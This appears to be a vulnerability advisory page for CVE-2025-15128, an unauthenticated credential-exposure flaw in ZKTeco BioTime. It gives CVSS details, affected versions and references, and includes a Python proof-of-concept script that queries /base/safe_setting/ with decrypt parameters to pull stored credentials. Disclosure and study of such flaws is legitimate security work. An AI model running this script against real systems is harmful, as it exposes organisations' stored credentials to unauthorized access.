Security Vulnerability Report

CVE-2025-15128 (CVSS 5.3, MEDIUM)

Published: 2025-12-28 09:15:41
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability was detected in ZKTeco BioTime up to 9.0.3/9.0.4/9.5.2. This affects an unknown part of the file /base/safe_setting/ of the component Endpoint. Performing a manipulation of the argument backup_encryption_password_decrypt/export_encryption_password_decrypt results in unprotected storage of credentials. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS 3.1 Score: 5.3 (MEDIUM)
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (exploitability 3.9, impact 1.4)
CVSS 4.0 Score: 5.5 (MEDIUM, exploit maturity: proof of concept)
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 2.0 Score: 5.0 (MEDIUM, exploitability 10.0, impact 2.9)
CVSS 2.0 Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Configurations (Affected Products)

No NVD CPE configuration data is available for this record. The affected versions below are taken from the description:

ZKTeco BioTime <= 9.0.3
ZKTeco BioTime <= 9.0.4
ZKTeco BioTime <= 9.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-15128 PoC - ZKTeco BioTime Unprotected Credential Storage
# Target: ZKTeco BioTime <= 9.0.3/9.0.4/9.5.2


def exploit(target_url, param_type='backup_encryption_password_decrypt'):
    """
    Exploit IDOR vulnerability to access unprotected credentials
    param_type: 'backup_encryption_password_decrypt' or 'export_encryption_password_decrypt'
    """
    endpoints = [
        '/base/safe_setting/',
        '/base/safe_setting/index'
    ]
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        params = {param_type: '1'}
        print(f"[*] Testing endpoint: {url}")
        print(f"[*] Parameter: {param_type}")
        try:
            # No authentication required (PR:N, UI:N)
            response = requests.get(url, params=params, timeout=10, verify=False)
            if response.status_code == 200:
                # A 200 alone does not prove the secrets are exposed; inspect the body.
                print(f"[!] Potential credential data found!")
                print(f"[*] Response length: {len(response.text)} bytes")
                print(f"[*] Response preview:\n{response.text[:500]}")
                return response.text
            else:
                print(f"[*] Status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
    return None


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15128.py <target_url>")
        print("Example: python cve-2025-15128.py http://192.168.1.100:8080")
        sys.exit(1)
    target = sys.argv[1]
    print(f"[*] CVE-2025-15128 PoC - ZKTeco BioTime IDOR Credential Leak")
    print(f"[*] Target: {target}\n")
    exploit(target, 'backup_encryption_password_decrypt')
    exploit(target, 'export_encryption_password_decrypt')
```

References

https://github.com/ionutluca888/IDOR-POC-ZKBio-Time/tree/main
https://vuldb.com/?ctiid.338506
https://vuldb.com/?id.338506
https://vuldb.com/?submit.711813

Weaknesses (CWE)

CWE-255
CWE-256

NVD record status: Deferred